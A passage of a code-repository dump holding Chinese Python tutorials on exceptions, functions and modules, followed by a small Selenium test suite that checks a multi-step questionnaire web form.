打开一个已有文件,逐行读取内容,并顺序写入到另外一个文件\n\n```\n# 1. 打开文件\nfile_read = open(\"README\")\nfile_write = open(\"README[复件]\", \"w\")\n\n# 2. 读取并写入文件\nwhile True:\n # 每次读取一行\n text = file_read.readline()\n\n # 判断是否读取到内容\n if not text:\n break\n\n file_write.write(text)\n\n# 3. 
关闭文件\nfile_read.close()\nfile_write.close()\n```\n\n## 异常\n\n## 异常的概念\n\n- 程序在运行时,如果 `Python 解释器` **遇到** 到一个错误,**会停止程序的执行,并且提示一些错误信息**,这就是 **异常**\n- **程序停止执行并且提示错误信息** 这个动作,我们通常称之为:**抛出(raise)异常**\n\n## 捕获异常\n\n### 简单的捕获异常语法\n\n- 在程序开发中,如果 **对某些代码的执行不能确定是否正确**,可以增加 `try(尝试)` 来 **捕获异常**\n- 捕获异常最简单的语法格式:\n\n```\ntry:\n 尝试执行的代码\nexcept:\n 出现错误的处理\n```\n\n- `try` **尝试**,下方编写要尝试代码,不确定是否能够正常执行的代码\n- `except` **如果不是**,下方编写尝试失败的代码\n\n#### 简单异常捕获演练 —— 要求用户输入整数\n\n```\ntry:\n # 提示用户输入一个数字\n num = int(input(\"请输入数字:\"))\nexcept:\n print(\"请输入正确的数字\")\n```\n\n### 错误类型捕获\n\n- 在程序执行时,可能会遇到 **不同类型的异常**,并且需要 **针对不同类型的异常,做出不同的响应**,这个时候,就需要捕获错误类型了\n- 语法如下:\n\n```\ntry:\n # 尝试执行的代码\n pass\nexcept 错误类型1:\n # 针对错误类型1,对应的代码处理\n pass\nexcept (错误类型2, 错误类型3):\n # 针对错误类型2 和 3,对应的代码处理\n pass\nexcept Exception as result:\n print(\"未知错误 %s\" % result)\n```\n\n- 当 `Python` 解释器 **抛出异常** 时,**最后一行错误信息的第一个单词,就是错误类型**\n\n#### 异常类型捕获演练 —— 要求用户输入整数\n\n**需求**\n\n1. 提示用户输入一个整数\n2. 使用 `8` 除以用户输入的整数并且输出\n\n```\ntry:\n num = int(input(\"请输入整数:\"))\n result = 8 / num\n print(result)\nexcept ValueError:\n print(\"请输入正确的整数\")\nexcept ZeroDivisionError:\n print(\"除 0 错误\")\n```\n\n#### 捕获未知错误\n\n- 在开发时,**要预判到所有可能出现的错误**,还是有一定难度的\n- 如果希望程序 **无论出现任何错误**,都不会因为 `Python` 解释器 **抛出异常而被终止**,可以再增加一个 `except`\n\n语法如下:\n\n```\nexcept Exception as result:\n print(\"未知错误 %s\" % result)\n```\n\n### 异常捕获完整语法\n\n- 在实际开发中,为了能够处理复杂的异常情况,完整的异常语法如下:\n\n> 提示:\n>\n> - 有关完整语法的应用场景,在后续学习中,**结合实际的案例**会更好理解\n> - 现在先对这个语法结构有个印象即可\n\n```\ntry:\n # 尝试执行的代码\n pass\nexcept 错误类型1:\n # 针对错误类型1,对应的代码处理\n pass\nexcept 错误类型2:\n # 针对错误类型2,对应的代码处理\n pass\nexcept (错误类型3, 错误类型4):\n # 针对错误类型3 和 4,对应的代码处理\n pass\nexcept Exception as result:\n # 打印错误信息\n print(result)\nelse:\n # 没有异常才会执行的代码\n pass\nfinally:\n # 无论是否有异常,都会执行的代码\n print(\"无论是否有异常,都会执行的代码\")\n```\n\n- `else` 只有在没有异常时才会执行的代码\n- `finally` 无论是否有异常,都会执行的代码\n- 之前一个演练的 **完整捕获异常** 的代码如下:\n\n```\ntry:\n num = int(input(\"请输入整数:\"))\n result = 8 / num\n print(result)\nexcept ValueError:\n print(\"请输入正确的整数\")\nexcept ZeroDivisionError:\n print(\"除 0 错误\")\nexcept Exception as result:\n print(\"未知错误 %s\" % result)\nelse:\n print(\"正常执行\")\nfinally:\n print(\"执行完成,但是不保证正确\")\n```\n\n## 异常的传递\n\n- **异常的传递** —— 当 **函数/方法** 执行 **出现异常**,会 **将异常传递** 给 函数/方法 的 **调用一方**\n- 如果 **传递到主程序**,仍然 **没有异常处理**,程序才会被终止\n\n> 提示\n\n- 在开发中,可以在主函数中增加 **异常捕获**\n- 而在主函数中调用的其他函数,只要出现异常,都会传递到主函数的 **异常捕获** 中\n- 这样就不需要在代码中,增加大量的 **异常捕获**,能够保证代码的整洁\n\n**需求**\n\n1. 定义函数 `demo1()` **提示用户输入一个整数并且返回**\n2. 定义函数 `demo2()` 调用 `demo1()`\n3. 在主程序中调用 `demo2()`\n\n```\ndef demo1():\n return int(input(\"请输入一个整数:\"))\n\n\ndef demo2():\n return demo1()\n\ntry:\n print(demo2())\nexcept ValueError:\n print(\"请输入正确的整数\")\nexcept Exception as result:\n print(\"未知错误 %s\" % result)\n```\n\n## 抛出 `raise` 异常\n\n### 应用场景\n\n- 在开发中,除了 **代码执行出错** `Python` 解释器会 **抛出** 异常之外\n- 还可以根据 **应用程序** **特有的业务需求** **主动抛出异常**\n\n**示例**\n\n- 提示用户 **输入密码**,如果 **长度少于 8**,抛出 **异常**\n\n\n\n**注意**\n\n- 当前函数 **只负责** 提示用户输入密码,如果 **密码长度不正确,需要其他的函数进行额外处理**\n- 因此可以 **抛出异常**,由其他需要处理的函数 **捕获异常**\n\n### 抛出异常\n\n- `Python` 中提供了一个 `Exception` **异常类**\n- 在开发时,如果满足特定业务需求时,希望抛出异常,可以:\n 1. **创建** 一个 `Exception` 的 **对象**\n 2. 使用 `raise` **关键字** 抛出 **异常对象**\n\n**需求**\n\n- 定义 `input_password` 函数,提示用户输入密码\n- 如果用户输入长度 < 8,抛出异常\n- 如果用户输入长度 >=8,返回输入的密码\n\n```\ndef input_password():\n\n # 1. 提示用户输入密码\n pwd = input(\"请输入密码:\")\n\n # 2. 判断密码长度,如果长度 >= 8,返回用户输入的密码\n if len(pwd) >= 8:\n return pwd\n\n # 3. 
密码长度不够,需要抛出异常\n # 1> 创建异常对象 - 使用异常的错误信息字符串作为参数\n ex = Exception(\"密码长度不够\")\n\n # 2> 抛出异常对象\n raise ex\n\n\ntry:\n user_pwd = input_password()\n print(user_pwd)\nexcept Exception as result:\n print(\"发现错误:%s\" % result)\n```\n\n\n"
},
{
"alpha_fraction": 0.6201599836349487,
"alphanum_fraction": 0.6411070227622986,
"avg_line_length": 16.582590103149414,
"blob_id": "bf8d1d2f8b1d1d6f06b4b0e7439ff5825b803286",
"content_id": "8ab689546f2b80a5ab87f824ca35ae7cd57adbfd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14489,
"license_type": "permissive",
"max_line_length": 479,
"num_lines": 448,
"path": "/Python基础连载/函数模块.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:函数模块\n\n- 函数的快速体验\n- 定义函数 - def语句 / 函数名 / 参数列表 / return语句 / 调用自定义函数\n- 调用函数 - Python内置函数 / 导入模块和函数\n- 函数的参数 - 默认参数 / 可变参数 / 关键字参数 / 命名关键字参数\n- 函数的返回值 - 没有返回值 / 返回单个值 / 返回多个值\n- 用模块管理函数 - 模块的概念 / 用自定义模块管理函数 / 命名冲突的时候会怎样(同一个模块和不同的模块)\n\n## 函数的快速体验\n\n### 快速体验\n\n- 所谓**函数**,就是把 **具有独立功能的代码块** 组织为一个小模块,在需要的时候 **调用**\n- 函数的使用包含两个步骤:\n 1. 定义函数 —— **封装** 独立的功能\n 2. 调用函数 —— 享受 **封装** 的成果\n- **函数的作用**,在开发程序时,使用函数可以提高编写的效率以及代码的 **重用**\n\n**演练步骤**\n\n1. 新建 `04_函数` 项目\n2. 复制之前完成的 **乘法表** 文件\n3. 修改文件,增加函数定义 `multiple_table():`\n4. 新建另外一个文件,使用 `import` 导入并且调用函数\n\n## 函数基本使用\n\n### 函数的定义\n\n定义函数的格式如下:\n\n```\ndef 函数名():\n\n 函数封装的代码\n ……\n```\n\n1. `def` 是英文 `define` 的缩写\n2. **函数名称** 应该能够表达 **函数封装代码** 的功能,方便后续的调用\n3. **函数名称** 的命名应该 **符合** **标识符的命名规则**\n - 可以由 **字母**、**下划线** 和 **数字** 组成\n - **不能以数字开头**\n - **不能与关键字重名**\n\n### 函数调用\n\n调用函数很简单的,通过 `函数名()` 即可完成对函数的调用\n\n### 第一个函数演练\n\n**需求**\n\n- 1. 编写一个打招呼 `say_hello` 的函数,封装三行打招呼的代码\n- 1. 在函数下方调用打招呼的代码\n\n```\nname = \"小明\"\n\n\n# 解释器知道这里定义了一个函数\ndef say_hello():\n print(\"hello 1\")\n print(\"hello 2\")\n print(\"hello 3\")\n\nprint(name)\n# 只有在调用函数时,之前定义的函数才会被执行\n# 函数执行完成之后,会重新回到之前的程序中,继续执行后续的代码\nsay_hello()\n\nprint(name)\n```\n\n> 用 **单步执行 F8 和 F7** 观察以下代码的执行过程\n\n- 定义好函数之后,只表示这个函数封装了一段代码而已\n- 如果不主动调用函数,函数是不会主动执行的\n\n#### 思考\n\n- 能否将 **函数调用** 放在 **函数定义** 的上方?\n - 不能!\n - 因为在 **使用函数名** 调用函数之前,必须要保证 `Python` 已经知道函数的存在\n - 否则控制台会提示 `NameError: name 'say_hello' is not defined` (**名称错误:say_hello 这个名字没有被定义**)\n\n### PyCharm 的调试工具\n\n- **F8 Step Over** 可以单步执行代码,会把函数调用看作是一行代码直接执行\n- **F7 Step Into** 可以单步执行代码,如果是函数,会进入函数内部\n\n### 函数的文档注释\n\n- 在开发中,如果希望给函数添加注释,应该在 **定义函数** 的下方,使用 **连续的三对引号**\n- 在 **连续的三对引号** 之间编写对函数的说明文字\n- 在 **函数调用** 位置,使用快捷键 `CTRL + Q` 可以查看函数的说明信息\n\n> 注意:因为 **函数体相对比较独立**,**函数定义的上方**,应该和其他代码(包括注释)保留 **两个空行**\n\n## 函数的参数\n\n**演练需求**\n\n1. 开发一个 `sum_2_num` 的函数\n2. 函数能够实现 **两个数字的求和** 功能\n\n演练代码如下:\n\n```\ndef sum_2_num():\n\n num1 = 10\n num2 = 20\n result = num1 + num2\n\n print(\"%d + %d = %d\" % (num1, num2, result))\n\nsum_2_num()\n```\n\n**思考一下存在什么问题**\n\n> 函数只能处理 **固定数值** 的相加\n\n**如何解决?**\n\n- 如果能够把需要计算的数字,在调用函数时,传递到函数内部就好了!\n\n### 函数参数的使用\n\n- 在函数名的后面的小括号内部填写 **参数**\n- 多个参数之间使用 `,` 分隔\n\n```\ndef sum_2_num(num1, num2):\n\n result = num1 + num2\n \n print(\"%d + %d = %d\" % (num1, num2, result))\n\nsum_2_num(50, 20)\n```\n\n### 参数的作用\n\n- **函数**,把 **具有独立功能的代码块** 组织为一个小模块,在需要的时候 **调用**\n- **函数的参数**,增加函数的 **通用性**,针对 **相同的数据处理逻辑**,能够 **适应更多的数据**\n 1. 在函数 **内部**,把参数当做 **变量** 使用,进行需要的数据处理\n 2. 
函数调用时,按照函数定义的**参数顺序**,把 **希望在函数内部处理的数据**,**通过参数** 传递\n\n### 形参和实参\n\n- **形参**:**定义** 函数时,小括号中的参数,是用来接收参数用的,在函数内部 **作为变量使用**\n- **实参**:**调用** 函数时,小括号中的参数,是用来把数据传递到 **函数内部** 用的\n\n## 函数的返回值\n\n- 在程序开发中,有时候,会希望 **一个函数执行结束后,告诉调用者一个结果**,以便调用者针对具体的结果做后续的处理\n- **返回值** 是函数 **完成工作**后,**最后** 给调用者的 **一个结果**\n- 在函数中使用 `return` 关键字可以返回结果\n- 调用函数一方,可以 **使用变量** 来 **接收** 函数的返回结果\n\n> 注意:`return` 表示返回,后续的代码都不会被执行\n\n```\ndef sum_2_num(num1, num2):\n \"\"\"对两个数字的求和\"\"\"\n\n return num1 + num2\n\n# 调用函数,并使用 result 变量接收计算结果\nresult = sum_2_num(10, 20)\n\nprint(\"计算结果是 %d\" % result)\n```\n\n## 函数的嵌套调用\n\n- 一个函数里面 **又调用** 了 **另外一个函数**,这就是 **函数嵌套调用**\n\n+ 如果函数 `test2` 中,调用了另外一个函数 `test1`\n + 那么执行到调用 `test1` 函数时,会先把函数 `test1` 中的任务都执行完\n + 才会回到 `test2` 中调用函数 `test1` 的位置,继续执行后续的代码\n\n```\ndef test1():\n\n print(\"*\" * 50)\n print(\"test 1\")\n print(\"*\" * 50)\n\n\ndef test2():\n\n print(\"-\" * 50)\n print(\"test 2\")\n \n test1()\n \n print(\"-\" * 50)\n\ntest2()\n```\n\n### 函数嵌套的演练 —— 打印分隔线\n\n> 体会一下工作中 **需求是多变** 的\n\n**需求 1**\n\n- 定义一个 `print_line` 函数能够打印 `*` 组成的 **一条分隔线**\n\n```\ndef print_line(char):\n\n print(\"*\" * 50)\n```\n\n**需求 2**\n\n- 定义一个函数能够打印 **由任意字符组成** 的分隔线\n\n```\ndef print_line(char):\n\n print(char * 50)\n \n```\n\n**需求 3**\n\n- 定义一个函数能够打印 **任意重复次数** 的分隔线\n\n```\ndef print_line(char, times):\n\n print(char * times)\n```\n\n**需求 4**\n\n- 定义一个函数能够打印 **5 行** 的分隔线,分隔线要求符合**需求 3**\n\n> 提示:工作中针对需求的变化,应该冷静思考,**不要轻易修改之前已经完成的,能够正常执行的函数**!\n\n```\ndef print_line(char, times):\n\n print(char * times)\n\n\ndef print_lines(char, times):\n\n row = 0\n \n while row < 5:\n print_line(char, times)\n\n row += 1\n```\n\n\n\n### 用模块管理函数\n\n对于任何一种编程语言来说,给变量、函数这样的标识符起名字都是一个让人头疼的问题,因为我们会遇到命名冲突这种尴尬的情况。最简单的场景就是在同一个.py文件中定义了两个同名函数,由于Python没有函数重载的概念,那么后面的定义会覆盖之前的定义,也就意味着两个函数同名函数实际上只有一个是存在的。\n\n```\ndef foo():\n print('hello, world!')\n\n\ndef foo():\n print('goodbye, world!')\n\n\n# 下面的代码会输出什么呢?\nfoo()\n```\n\n当然上面的这种情况我们很容易就能避免,但是如果项目是由多人协作进行团队开发的时候,团队中可能有多个程序员都定义了名为`foo`的函数,那么怎么解决这种命名冲突呢?答案其实很简单,Python中每个文件就代表了一个模块(module),我们在不同的模块中可以有同名的函数,在使用函数的时候我们通过`import`关键字导入指定的模块就可以区分到底要使用的是哪个模块中的`foo`函数,代码如下所示。\n\n```\nmodule1.py\ndef foo():\n print('hello, world!')\nmodule2.py\ndef foo():\n print('goodbye, world!')\ntest.py\nfrom module1 import foo\n\n# 输出hello, world!\nfoo()\n\nfrom module2 import foo\n\n# 输出goodbye, world!\nfoo()\n```\n\n也可以按照如下所示的方式来区分到底要使用哪一个`foo`函数。\n\n```\ntest.py\nimport module1 as m1\nimport module2 as m2\n\nm1.foo()\nm2.foo()\n```\n\n但是如果将代码写成了下面的样子,那么程序中调用的是最后导入的那个`foo`,因为后导入的foo覆盖了之前导入的`foo`。\n\n```\ntest.py\nfrom module1 import foo\nfrom module2 import foo\n\n# 输出goodbye, world!\nfoo()\ntest.py\nfrom module2 import foo\nfrom module1 import foo\n\n# 输出hello, world!\nfoo()\n```\n\n需要说明的是,如果我们导入的模块除了定义函数之外还中有可以执行代码,那么Python解释器在导入这个模块时就会执行这些代码,事实上我们可能并不希望如此,因此如果我们在模块中编写了执行代码,最好是将这些执行代码放入如下所示的条件中,这样的话除非直接运行该模块,if条件下的这些代码是不会执行的,因为只有直接执行的模块的名字才是\"__main__\"。\n\n```\nmodule3.py\ndef foo():\n pass\n\n\ndef bar():\n pass\n\n\n# __name__是Python中一个隐含的变量它代表了模块的名字\n# 只有被Python解释器直接执行的模块的名字才是__main__\nif __name__ == '__main__':\n print('call foo()')\n foo()\n print('call bar()')\n bar()\ntest.py\nimport module3\n\n# 导入module3时 不会执行模块中if条件成立时的代码 因为模块的名字是module3而不是__main__\n```\n\n\n\n### 练习\n\n#### 练习1:实现判断一个数是不是回文数的函数。\n\n参考答案:\n\n```\ndef is_palindrome(num):\n \"\"\"判断一个数是不是回文数\"\"\"\n temp = num\n total = 0\n while temp > 0:\n total = total * 10 + temp % 10\n temp //= 10\n return total == num\n```\n\n#### 练习2:实现判断一个数是不是素数的函数。\n\n参考答案:\n\n```\ndef is_prime(num):\n \"\"\"判断一个数是不是素数\"\"\"\n for factor in 
range(2, int(num ** 0.5) + 1):\n if num % factor == 0:\n return False\n return True if num != 1 else False\n```\n\n### 拓展:变量的作用域\n\n最后,我们来讨论一下Python中有关变量作用域的问题。\n\n```\ndef foo():\n b = 'hello'\n\n # Python中可以在函数内部再定义函数\n def bar():\n c = True\n print(a)\n print(b)\n print(c)\n\n bar()\n # print(c) # NameError: name 'c' is not defined\n\n\nif __name__ == '__main__':\n a = 100\n # print(b) # NameError: name 'b' is not defined\n foo()\n```\n\n上面的代码能够顺利的执行并且打印出100、hello和True,但我们注意到了,在`bar`函数的内部并没有定义`a`和`b`两个变量,那么`a`和`b`是从哪里来的。我们在上面代码的`if`分支中定义了一个变量`a`,这是一个全局变量(global variable),属于全局作用域,因为它没有定义在任何一个函数中。在上面的`foo`函数中我们定义了变量`b`,这是一个定义在函数中的局部变量(local variable),属于局部作用域,在`foo`函数的外部并不能访问到它;但对于`foo`函数内部的`bar`函数来说,变量`b`属于嵌套作用域,在`bar`函数中我们是可以访问到它的。`bar`函数中的变量`c`属于局部作用域,在`bar`函数之外是无法访问的。事实上,Python查找一个变量时会按照“局部作用域”、“嵌套作用域”、“全局作用域”和“内置作用域”的顺序进行搜索,前三者我们在上面的代码中已经看到了,所谓的“内置作用域”就是Python内置的那些标识符,我们之前用过的`input`、`print`、`int`等都属于内置作用域。\n\n再看看下面这段代码,我们希望通过函数调用修改全局变量`a`的值,但实际上下面的代码是做不到的。\n\n```\ndef foo():\n a = 200\n print(a) # 200\n\n\nif __name__ == '__main__':\n a = 100\n foo()\n print(a) # 100\n```\n\n在调用`foo`函数后,我们发现`a`的值仍然是100,这是因为当我们在函数`foo`中写`a = 200`的时候,是重新定义了一个名字为`a`的局部变量,它跟全局作用域的`a`并不是同一个变量,因为局部作用域中有了自己的变量`a`,因此`foo`函数不再搜索全局作用域中的`a`。如果我们希望在`foo`函数中修改全局作用域中的`a`,代码如下所示。\n\n```\ndef foo():\n global a\n a = 200\n print(a) # 200\n\n\nif __name__ == '__main__':\n a = 100\n foo()\n print(a) # 200\n```\n\n我们可以使用`global`关键字来指示`foo`函数中的变量`a`来自于全局作用域,如果全局作用域中没有`a`,那么下面一行的代码就会定义变量`a`并将其置于全局作用域。同理,如果我们希望函数内部的函数能够修改嵌套作用域中的变量,可以使用`nonlocal`关键字来指示变量来自于嵌套作用域,请大家自行试验。\n\n在实际开发中,我们应该尽量减少对全局变量的使用,因为全局变量的作用域和影响过于广泛,可能会发生意料之外的修改和使用,除此之外全局变量比局部变量拥有更长的生命周期,可能导致对象占用的内存长时间无法被[垃圾回收](https://zh.wikipedia.org/wiki/垃圾回收_(計算機科學))。事实上,减少对全局变量的使用,也是降低代码之间耦合度的一个重要举措,同时也是对[迪米特法则](https://zh.wikipedia.org/zh-hans/得墨忒耳定律)的践行。减少全局变量的使用就意味着我们应该尽量让变量的作用域在函数的内部,但是如果我们希望将一个局部变量的生命周期延长,使其在定义它的函数调用结束后依然可以使用它的值,这时候就需要使用[闭包](https://zh.wikipedia.org/wiki/闭包_(计算机科学)),这个我们在后续的内容中进行讲解。\n\n\n"
},
{
"alpha_fraction": 0.5962441563606262,
"alphanum_fraction": 0.7840375304222107,
"avg_line_length": 41.20000076293945,
"blob_id": "85902d195c0dd496b35631c0acee941587462bea",
"content_id": "4db05905ad6ebe401a472791530044a3b8b1a3d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 265,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 5,
"path": "/docs/获取计算机网络pdf.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "关注公众号:CookDev 回复:计算机网络\n\n\n\n\n\n\n"
}
] | 13 |
xahgmah/questionnaire_tests
|
https://github.com/xahgmah/questionnaire_tests
|
c8ccaaab5b16d9e79660ff0711d7d904207426e6
|
eb67d3d3f29b986a04cd6ad27a70d35ea3a6b32b
|
da858dc4d4add31231ae51f621d45b71a153d181
|
refs/heads/master
| 2021-04-03T23:27:05.979666 | 2016-06-03T17:02:51 | 2016-06-03T17:02:51 | 60,363,171 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6209408044815063,
"alphanum_fraction": 0.6245827078819275,
"avg_line_length": 44.136985778808594,
"blob_id": "40944d52f556da98756a676cf107078db4bc6190",
"content_id": "8b9c7948a0d9a58b93fb5308988f1f7e9974c26b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3295,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 73,
"path": "/base_step.py",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom grail import step\n\n\nclass BaseStep(object):\n FIELD_TEXT = \"text\"\n FIELD_TEXTAREA = \"textarea\"\n FIELD_EMAIL = \"email\"\n FIELD_RADIO = \"radio\"\n FIELD_CHECKBOX = \"checkbox\"\n TEST_DATA = {\n FIELD_TEXT: \"test\",\n FIELD_TEXTAREA: \"test\",\n FIELD_EMAIL: \"[email protected]\",\n }\n next_url = None\n test_url = None\n fields = []\n submit_button = \"\"\n\n def __init__(self, testcase):\n self.testcase = testcase\n self.browser = self.testcase.browser\n self.browser.get(self.testcase.base_url + self.test_url)\n\n @step\n def _test_empty_data(self):\n required_fields = 0\n for name, properties in self.fields.iteritems():\n if properties[1] == 'required':\n required_fields += 1\n self.testcase.assertIn('Edx questionary', self.browser.title)\n self.browser.find_element_by_class_name(\"btn-\" + self.submit_button).click()\n self.testcase.assertIn(\"This field is required.\", self.browser.page_source)\n self.testcase.assertEqual(self.testcase.base_url + self.test_url, self.browser.current_url)\n\n @step\n def _test_wrong_email(self):\n for name, properties in self.fields.iteritems():\n if properties[0] == \"email\":\n self.browser.find_element_by_name(name).send_keys(\"test\")\n self.browser.find_element_by_class_name(\"btn-\" + self.submit_button).click()\n self.testcase.assertIn(\"Enter a valid email address.\", self.browser.page_source)\n self.testcase.assertEqual(self.testcase.base_url + self.test_url, self.browser.current_url)\n\n @step\n def _test_correct_data(self):\n for name, properties in self.fields.iteritems():\n if properties[0] == BaseStep.FIELD_RADIO:\n self.browser.find_element_by_xpath(\"//label[@for='id_\" + name + \"_0']\").click()\n elif properties[0] == BaseStep.FIELD_CHECKBOX:\n self.browser.find_element_by_xpath(\"//input[@name='\" + name + \"']/following-sibling::*\").click()\n else:\n test_data = self.TEST_DATA[properties[0]]\n field = self.browser.find_element_by_name(name)\n field.clear()\n field.send_keys(test_data)\n self.browser.find_element_by_class_name(\"btn-\" + self.submit_button).click()\n self.testcase.assertFalse(self.browser.find_elements_by_class_name(\"errorlist\"))\n self.testcase.assertNotEqual(self.browser.current_url, self.testcase.base_url + self.test_url)\n self.testcase.assertEqual(self.browser.current_url, self.testcase.base_url + self.next_url)\n\n @step\n def _test_saved_data(self):\n self.browser.get(self.testcase.base_url + self.test_url)\n for name, properties in self.fields.iteritems():\n field = self.browser.find_element_by_name(name)\n if properties[0] == BaseStep.FIELD_TEXTAREA:\n self.testcase.assertEqual(field.text, self.TEST_DATA[properties[0]])\n elif properties[0] in [BaseStep.FIELD_RADIO, BaseStep.FIELD_CHECKBOX]:\n self.testcase.assertNotEqual(field.get_attribute(\"value\"), \"\")\n else:\n self.testcase.assertEqual(field.get_attribute(\"value\"), self.TEST_DATA[properties[0]])\n"
},
{
"alpha_fraction": 0.40909090638160706,
"alphanum_fraction": 0.6590909361839294,
"avg_line_length": 13.666666984558105,
"blob_id": "865ec854303b4c812240df5a7ae9f58c085d3c5e",
"content_id": "73ef1ac850ee0d3faa3a2dcbe5f051dbd62499be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 44,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "grail==1.0.9\nselenium==2.53.2\nwheel==0.26.0\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 16.571428298950195,
"blob_id": "288c0ae494817206d942c5c61f77f281a4c8eb68",
"content_id": "3b232205e84bc74115adf63d1a10f3883af35ac0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 124,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/README.md",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "# questionnaire_tests\nSelenium tests for questionnaire form\n\n```\npip install -r requirements.txt\npython ./seltests.py \n```\n\n"
},
{
"alpha_fraction": 0.6001121997833252,
"alphanum_fraction": 0.6068423986434937,
"avg_line_length": 32.622642517089844,
"blob_id": "0d9b4690795ae497ab4ad2b6867fc878afad2863",
"content_id": "62bfacc36326e061f53054238d89afbbb790261b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1783,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 53,
"path": "/steps.py",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "from base_step import BaseStep\n\n\nclass FirstStep(BaseStep):\n test_url = \"/en/pricing/\"\n next_url = \"/en/questionnaire/2/\"\n fields = {\n \"first_name\": (BaseStep.FIELD_TEXT, \"required\"),\n \"second_name\": (BaseStep.FIELD_TEXT, \"required\"),\n BaseStep.FIELD_EMAIL: (BaseStep.FIELD_EMAIL, \"required\"),\n \"organization\": (BaseStep.FIELD_TEXT, \"required\"),\n \"job_title\": (BaseStep.FIELD_TEXT, \"required\"),\n \"website\": (BaseStep.FIELD_TEXT, \"required\"),\n \"purpose\": (BaseStep.FIELD_TEXTAREA, \"required\")\n }\n submit_button = \"next\"\n\n\nclass SecondStep(BaseStep):\n test_url = \"/en/questionnaire/2/\"\n next_url = \"/en/questionnaire/3/\"\n fields = {\n \"active_users2\": (BaseStep.FIELD_RADIO, \"required\"),\n \"registered_users2\": (BaseStep.FIELD_RADIO, \"required\"),\n \"hosting\": (BaseStep.FIELD_RADIO, \"required\"),\n \"mobileapp\": (BaseStep.FIELD_RADIO, \"required\"),\n }\n submit_button = \"next\"\n\n\nclass ThirdStep(BaseStep):\n test_url = \"/en/questionnaire/3/\"\n next_url = \"/en/questionnaire/4/\"\n fields = {\n \"localization2\": (BaseStep.FIELD_TEXTAREA, \"required\"),\n \"certificates2\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"lit2\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"sso2\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"scorm\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"commerce\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"microsites\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n }\n submit_button = \"next\"\n\n\nclass ForthStep(BaseStep):\n test_url = \"/en/questionnaire/4/\"\n next_url = \"/en/\"\n fields = {\n \"xb_enable\": (BaseStep.FIELD_TEXTAREA, \"\"),\n \"xb_dev\": (BaseStep.FIELD_TEXTAREA, \"\"),\n }\n submit_button = \"finish\"\n\n"
},
{
"alpha_fraction": 0.5574672818183899,
"alphanum_fraction": 0.5602202415466309,
"avg_line_length": 26.94230842590332,
"blob_id": "496862b13a8462e73dc344b909ee68010f1de119",
"content_id": "9382697e8b9a966bab27e398a9c9420c4cf3b855",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1453,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 52,
"path": "/seltests.py",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nimport unittest\nimport steps\n\n\nclass QuestionaryTestCase(unittest.TestCase):\n def setUp(self):\n self.browser = webdriver.Chrome(\"./chromedriver\")\n self.base_url = \"https://raccoongang.com\"\n\n def step1(self):\n self.step = steps.FirstStep(self)\n self.step._test_empty_data()\n self.step._test_wrong_email()\n self.step._test_correct_data()\n self.step._test_saved_data()\n\n def step2(self):\n self.step = steps.SecondStep(self)\n self.step._test_empty_data()\n self.step._test_correct_data()\n self.step._test_saved_data()\n\n def step3(self):\n self.step = steps.ThirdStep(self)\n self.step._test_empty_data()\n self.step._test_correct_data()\n self.step._test_saved_data()\n\n def step4(self):\n self.step = steps.ForthStep(self)\n self.step._test_correct_data()\n\n def list_of_steps(self):\n for name in sorted(dir(self)):\n if name.startswith(\"step\"):\n yield name, getattr(self, name)\n\n def test_steps(self):\n for name, step in self.list_of_steps():\n try:\n print \"========== %s ==========\" % name\n step()\n except Exception as e:\n self.fail(\"{} failed ({}: {})\".format(step, type(e), e))\n\n def tearDown(self):\n self.step.browser.quit()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
}
] | 5 |
llislex/py_draugth
|
https://github.com/llislex/py_draugth
|
e3012b1e948b5e1eb3b6674a018b7ef3969c8e33
|
1b31e8321861ec4ddf7ab7da35aac71c2db8d1ef
|
276b46e011efa288b46e23eae14ed2aadb0f6312
|
refs/heads/master
| 2022-02-11T16:29:39.268791 | 2022-01-04T21:09:05 | 2022-01-04T21:09:05 | 145,456,865 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.61756831407547,
"alphanum_fraction": 0.6288163065910339,
"avg_line_length": 21.780487060546875,
"blob_id": "c003f8618db13690d9a4375bfb8bdf0b24604c99",
"content_id": "d7510ad1d5313e5e2b1a7bc5f71b263e6733095e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1867,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 82,
"path": "/ut.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
